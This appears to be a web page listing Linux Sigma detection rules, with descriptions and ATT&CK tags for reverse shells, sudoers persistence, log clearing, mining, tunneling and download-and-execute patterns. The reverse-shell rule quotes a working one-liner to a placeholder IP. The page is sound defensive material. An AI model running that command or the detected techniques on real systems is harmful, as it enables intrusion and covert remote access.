Rule Library

Sigma Rules

3,116 rules found

3,707Total
3,116Detection
451Emerging
137Hunting
Detectionmediumtest

Persistence Via Sudoers Files

Detects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user.

LinuxFile Event
TA0004 · Privilege EscalationTA0002 · ExecutionTA0003 · PersistenceT1053.003 · Cron
Nasreddine Bencherchali (Nextron Systems)Tue Jul 05linux
Detectionhighexperimental

Suspicious Filename with Embedded Base64 Commands

Detects files with specially crafted filenames that embed Base64-encoded bash payloads designed to execute when processed by shell scripts. These filenames exploit shell interpretation quirks to trigger hidden commands, a technique observed in VShell malware campaigns.

LinuxFile Event
TA0002 · ExecutionT1059.004 · Unix ShellTA0005 · Defense EvasionT1027 · Obfuscated Files or Information
kostastsaleSat Nov 22linux
Detectionlowtest

Potentially Suspicious Shell Script Creation in Profile Folder

Detects the creation of shell scripts under the "profile.d" path.

LinuxFile Event
TA0003 · Persistence
Joseliyo SanchezFri Jun 02linux
Detectionhightest

Triple Cross eBPF Rootkit Default LockFile

Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.

LinuxFile Event
TA0005 · Defense Evasion
Nasreddine Bencherchali (Nextron Systems)Tue Jul 05linux
Detectionhightest

Triple Cross eBPF Rootkit Default Persistence

Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method

LinuxFile Event
TA0004 · Privilege EscalationTA0002 · ExecutionTA0003 · PersistenceTA0005 · Defense Evasion+1
Nasreddine Bencherchali (Nextron Systems)Tue Jul 05linux
Detectionmediumtest

Wget Creating Files in Tmp Directory

Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp"

LinuxFile Event
TA0011 · Command and ControlT1105 · Ingress Tool Transfer
Joseliyo SanchezFri Jun 02linux
Detectioncriticaltest

Linux Reverse Shell Indicator

Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')

LinuxNetwork Connection
TA0002 · ExecutionT1059.004 · Unix Shell
Florian Roth (Nextron Systems)Sat Oct 16linux
Detectionhighstable

Linux Crypto Mining Pool Connections

Detects process connections to a Monero crypto mining pool

LinuxNetwork Connection
TA0040 · ImpactT1496 · Resource Hijacking
Florian Roth (Nextron Systems)Tue Oct 26linux
Detectionhightest

Communication To LocaltoNet Tunneling Service Initiated - Linux

Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.

LinuxNetwork Connection
TA0011 · Command and ControlT1572 · Protocol TunnelingT1090 · ProxyT1102 · Web Service
Andreas Braathen (mnemonic.io)Mon Jun 17linux
Detectionhightest

Communication To Ngrok Tunneling Service - Linux

Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors

LinuxNetwork Connection
TA0010 · ExfiltrationTA0011 · Command and ControlT1567 · Exfiltration Over Web ServiceT1568.002 · Domain Generation Algorithms+4
Florian Roth (Nextron Systems)Thu Nov 03linux
Detectionhightest

Potentially Suspicious Malware Callback Communication - Linux

Detects programs that connect to known malware callback ports based on threat intelligence reports.

LinuxNetwork Connection
TA0003 · PersistenceTA0011 · Command and ControlT1571 · Non-Standard Port
hasseljFri May 10linux
Detectionmediumtest

Shell Invocation via Apt - Linux

Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

LinuxProcess Creation
TA0007 · DiscoveryT1083 · File and Directory Discovery
Nasreddine Bencherchali (Nextron Systems)Wed Dec 28linux
Detectionlowstable

Scheduled Task/Job At

Detects the use of at/atd which are utilities that are used to schedule tasks. They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code

LinuxProcess Creation
TA0004 · Privilege EscalationTA0002 · ExecutionTA0003 · PersistenceT1053.002 · At
Ömer Günal+1Tue Oct 06linux
Detectionhighexperimental

Audit Rules Deleted Via Auditctl

Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems. This technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities. Removal of audit rules can significantly impair detection of malicious activities on the affected system.

LinuxProcess Creation
TA0005 · Defense EvasionT1562.012 · Disable or Modify Linux Audit System
Mohamed LAKRIFri Oct 17linux
Detectionhighexperimental

Kaspersky Endpoint Security Stopped Via CommandLine - Linux

Detects execution of the Kaspersky init.d stop script on Linux systems either directly or via systemctl. This activity may indicate a manual interruption of the antivirus service by an administrator, or it could be a sign of potential tampering or evasion attempts by malicious actors.

LinuxProcess Creation
TA0002 · ExecutionTA0005 · Defense EvasionT1562.001 · Disable or Modify Tools
Milad CheraghiSat Oct 18linux
Detectionhightest

Suspicious Invocation of Shell via AWK - Linux

Detects the execution of "awk" or it's sibling commands, to invoke a shell using the system() function. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.

LinuxProcess Creation
TA0002 · ExecutionT1059 · Command and Scripting Interpreter
Li Ling+3Mon Sep 02linux
Detectionlowtest

Decode Base64 Encoded Text

Detects usage of base64 utility to decode arbitrary base64-encoded text

LinuxProcess Creation
TA0005 · Defense EvasionT1027 · Obfuscated Files or Information
Daniil Yugoslavskiy+1Mon Oct 19linux
Detectionmediumtest

Linux Base64 Encoded Pipe to Shell

Detects suspicious process command line that uses base64 encoded input for execution with a shell

LinuxProcess Creation
TA0005 · Defense EvasionT1140 · Deobfuscate/Decode Files or Information
Martin MuellerTue Jul 26linux
Detectionmediumtest

Linux Base64 Encoded Shebang In CLI

Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded

LinuxProcess Creation
TA0005 · Defense EvasionT1140 · Deobfuscate/Decode Files or Information
Nasreddine Bencherchali (Nextron Systems)Thu Sep 15linux
Detectionlowtest

Bash Interactive Shell

Detects execution of the bash shell with the interactive flag "-i".

LinuxProcess Creation
TA0002 · Execution
@d4ns4n_Fri Apr 07linux
Detectionmediumtest

Enable BPF Kprobes Tracing

Detects common command used to enable bpf kprobes tracing

LinuxProcess Creation
TA0002 · ExecutionTA0005 · Defense Evasion
Nasreddine Bencherchali (Nextron Systems)Wed Jan 25linux
Detectionmediumtest

BPFtrace Unsafe Option Usage

Detects the usage of the unsafe bpftrace option

LinuxProcess Creation
TA0002 · ExecutionT1059.004 · Unix Shell
Andreas HunkelerFri Feb 11linux
Detectionlowexperimental

Linux Setgid Capability Set on a Binary via Setcap Utility

Detects the use of the 'setcap' utility to set the 'setgid' capability (cap_setgid) on a binary file. This capability allows a non privileged process to make arbitrary manipulations of group IDs (GIDs), including setting its current GID to a value that would otherwise be restricted (i.e. GID 0, the root group). This behavior can be used by adversaries to backdoor a binary in order to escalate privileges again in the future if needed.

LinuxProcess Creation
TA0004 · Privilege EscalationTA0005 · Defense EvasionTA0003 · PersistenceT1548 · Abuse Elevation Control Mechanism+1
Luc GénauxSat Jan 24linux
Detectionlowexperimental

Linux Setuid Capability Set on a Binary via Setcap Utility

Detects the use of the 'setcap' utility to set the 'setuid' capability (cap_setuid) on a binary file. This capability allows a non privileged process to make arbitrary manipulations of user IDs (UIDs), including setting its current UID to a value that would otherwise be restricted (i.e. UID 0, the root user). This behavior can be used by adversaries to backdoor a binary in order to escalate privileges again in the future if needed.

LinuxProcess Creation
TA0004 · Privilege EscalationTA0005 · Defense EvasionTA0003 · PersistenceT1548 · Abuse Elevation Control Mechanism+1
Luc GénauxSat Jan 24linux
Detectionlowtest

Capabilities Discovery - Linux

Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.

LinuxProcess Creation
TA0007 · DiscoveryT1083 · File and Directory Discovery
Nasreddine Bencherchali (Nextron Systems)Wed Dec 28linux
Detectionhightest

Capsh Shell Invocation - Linux

Detects the use of the "capsh" utility to invoke a shell.

LinuxProcess Creation
TA0002 · ExecutionT1059 · Command and Scripting Interpreter
Li Ling+3Mon Sep 02linux
Detectionmediumtest

Remove Immutable File Attribute

Detects usage of the 'chattr' utility to remove immutable file attribute.

LinuxProcess Creation
TA0005 · Defense Evasionattack.t1222.002
Nasreddine Bencherchali (Nextron Systems)Thu Sep 15linux
Detectionlowexperimental

Linux Sudo Chroot Execution

Detects the execution of 'sudo' command with '--chroot' option, which is used to change the root directory for command execution. Attackers may use this technique to evade detection and execute commands in a modified environment. This can be part of a privilege escalation strategy, as it allows the execution of commands with elevated privileges in a controlled environment as seen in CVE-2025-32463. While investigating, look out for unusual or unexpected use of 'sudo --chroot' in conjunction with other commands or scripts such as execution from temporary directories or unusual user accounts.

LinuxProcess Creation
TA0004 · Privilege EscalationT1068 · Exploitation for Privilege Escalation
Swachchhanda Shrawn Poudel (Nextron Systems)Thu Oct 02linux
Detectionmediumstable

Clear Linux Logs

Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion

LinuxProcess Creation
TA0005 · Defense EvasionT1070.002 · Clear Linux or Mac System Logs
Ömer Günal+1Wed Oct 07linux
Detectionhightest

Syslog Clearing or Removal Via System Utilities

Detects specific commands commonly used to remove or empty the syslog. Which is a technique often used by attacker as a method to hide their tracks

LinuxProcess Creation
TA0005 · Defense EvasionT1070.002 · Clear Linux or Mac System Logs
Max Altgelt (Nextron Systems)+3Fri Oct 15linux
Detectionlowtest

Clipboard Collection with Xclip Tool

Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.

LinuxProcess Creation
TA0009 · CollectionT1115 · Clipboard Data
Pawel Mazur+3Fri Oct 15linux
Detectionhightest

Copy Passwd Or Shadow From TMP Path

Detects when the file "passwd" or "shadow" is copied from tmp path

LinuxProcess Creation
TA0006 · Credential AccessT1552.001 · Credentials In Files
Joseliyo SanchezTue Jan 31linux
Detectionlowtest

Crontab Enumeration

Detects usage of crontab to list the tasks of the user

LinuxProcess Creation
TA0007 · DiscoveryT1007 · System Service Discovery
Joseliyo SanchezFri Jun 02linux
Detectionmediumtest

Remove Scheduled Cron Task/Job

Detects usage of the 'crontab' utility to remove the current crontab. This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible

LinuxProcess Creation
TA0005 · Defense Evasion
Nasreddine Bencherchali (Nextron Systems)Thu Sep 15linux
Detectionhightest

Linux Crypto Mining Indicators

Detects command line parameters or strings often used by crypto miners

LinuxProcess Creation
TA0040 · ImpactT1496 · Resource Hijacking
Florian Roth (Nextron Systems)Tue Oct 26linux
Detectionlowtest

Curl Usage on Linux

Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server

LinuxProcess Creation
TA0011 · Command and ControlT1105 · Ingress Tool Transfer
Nasreddine Bencherchali (Nextron Systems)Thu Sep 15linux
Detectionhighexperimental

Suspicious Download and Execute Pattern via Curl/Wget

Detects suspicious use of command-line tools such as curl or wget to download remote content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by immediate execution, indicating potential malicious activity. This pattern is commonly used by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.

LinuxProcess Creation
TA0002 · ExecutionT1059.004 · Unix ShellT1203 · Exploitation for Client Execution
Aayush GuptaTue Jun 17linux
Detectionlowtest

DD File Overwrite

Detects potential overwriting and deletion of a file using DD.

LinuxProcess Creation
TA0040 · ImpactT1485 · Data Destruction
Roberto Rodriguez (Cyb3rWard0g)+2Fri Oct 15linux
Detectionmediumtest

Potential Linux Process Code Injection Via DD Utility

Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command.

LinuxProcess Creation
TA0004 · Privilege EscalationTA0005 · Defense EvasionT1055.009 · Proc Memory
Joseph KamauFri Dec 01linux
Detectionmediumtest

Ufw Force Stop Using Ufw-Init

Detects attempts to force stop the ufw using ufw-init

LinuxProcess Creation
TA0005 · Defense EvasionT1562.004 · Disable or Modify System Firewall
Joseliyo SanchezWed Jan 18linux
Detectionlowstable

Linux Doas Tool Execution

Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.

LinuxProcess Creation
TA0005 · Defense EvasionTA0004 · Privilege EscalationT1548 · Abuse Elevation Control Mechanism
Sittikorn S+1Thu Jan 20linux
Detectionhightest

Shell Invocation via Env Command - Linux

Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.

LinuxProcess Creation
TA0002 · ExecutionT1059 · Command and Scripting Interpreter
Li Ling+3Mon Sep 02linux
Detectionmediumtest

ESXi Network Configuration Discovery Via ESXCLI

Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration.

LinuxProcess Creation
TA0007 · DiscoveryTA0002 · ExecutionT1033 · System Owner/User DiscoveryT1007 · System Service Discovery+1
Cedric MaurugeonMon Sep 04linux
Detectionhightest

ESXi Admin Permission Assigned To Account Via ESXCLI

Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account.

LinuxProcess Creation
TA0003 · PersistenceTA0002 · ExecutionTA0004 · Privilege Escalationattack.t1059.012+1
Nasreddine Bencherchali (Nextron Systems)Mon Sep 04linux
Detectionmediumtest

ESXi Storage Information Discovery Via ESXCLI

Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.

LinuxProcess Creation
TA0007 · DiscoveryTA0002 · ExecutionT1033 · System Owner/User DiscoveryT1007 · System Service Discovery+1
Nasreddine Bencherchali (Nextron Systems)+1Mon Sep 04linux
Detectionmediumtest

ESXi Syslog Configuration Change Via ESXCLI

Detects changes to the ESXi syslog configuration via "esxcli"

LinuxProcess Creation
TA0005 · Defense EvasionTA0002 · ExecutionT1562.001 · Disable or Modify ToolsT1562.003 · Impair Command History Logging+1
Cedric MaurugeonMon Sep 04linux
Detectionmediumtest

ESXi System Information Discovery Via ESXCLI

Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc.

LinuxProcess Creation
TA0007 · DiscoveryTA0002 · ExecutionT1033 · System Owner/User DiscoveryT1007 · System Service Discovery+1
Cedric MaurugeonMon Sep 04linux
Detectionmediumtest

ESXi Account Creation Via ESXCLI

Detects user account creation on ESXi system via esxcli

LinuxProcess Creation
TA0003 · PersistenceTA0002 · ExecutionT1136 · Create Accountattack.t1059.012
Cedric MaurugeonTue Aug 22linux